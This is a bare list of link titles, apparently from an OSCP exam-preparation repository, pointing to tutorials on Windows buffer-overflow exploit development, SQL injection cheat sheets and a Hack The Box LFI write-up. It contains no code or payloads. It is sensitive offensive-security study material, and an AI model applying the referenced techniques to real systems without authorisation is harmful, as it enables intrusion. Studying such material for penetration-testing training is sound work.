(1) Buffer Overflow Exploitation (Minishare & FreeFloat) — YouTube
justinsteven/dostackbufferoverflowgood
jessekurrus/slmailsploits: Several Python scripts used to fuzz and exploit SLmail. These are meant to supplement the Kali Linux Hands-on Pentesting Udemy course.
(2) Immunity Debugger Overview — YouTube
Stack Based Buffer Overflow in Win 32 Platform: The Basics
Stack Buffer Overflow Vulnerability — PCMan FTP Server 2.0.7 | Ahmet GÜREL
Zero Day Zen Garden: Windows Exploit Development — Part 5 [Return Oriented Programming Chains]
Zero Day Zen Garden: Windows Exploit Development — Part 4 [Overwriting SEH with Buffer Overflows]
Buffer Overflow — Easy Chat Server 3.1 — OnSecurity
Buffer Overflow Exploit Development ~ BTRiskBlog: Everything About Pentest, ISO27001 and IT Audit
Coalfire — The Basics of Exploit Development 1: Win32 Buffer Overflows
Coalfire — Coalfire Blog
Customized Mail Server Software Buffer Overflow on Windows Server 2008 | by Rudy Samuel Pardosi | Medium
A Simple Buffer Overflow Using Vulnserver | by Z3R0th | Medium
Finding Bad Characters with Immunity Debugger and Mona.py — Bulb Security
minishare 1.4.1 exploit — YouTube
SQLI:
SQL-Injections · Security — My notepad
44348-error-based-sql-injection-in-order-by-clause-(mssql).pdf
Full MSSQL Injection PWNage
MSSQL Practical Injection Cheat Sheet — Perspective Risk
SQL Injection Cheat Sheet | Netsparker
Öner KAYA: Advanced SQL Injection Operations (Advanced Sql Injection)
Red Team Tales 0x01: From MSSQL to RCE — Tarlogic Security — Cyber Security and Ethical hacking
SQL Injection Cheat Sheet | Bhanu Notes
SQL-Injections · Total OSCP Guide
SQL Tutorial
LFI:
Hack The Box — Poison Writeup w/o Metasploit | by Rana Khalil | The Startup | Medium
(7) HackTheBox — Poison — YouTube
About this extraction

This page contains the full source code of the omurugur/OSCP GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 12 files (26.8 KB), approximately 9.6k tokens. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.

Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.
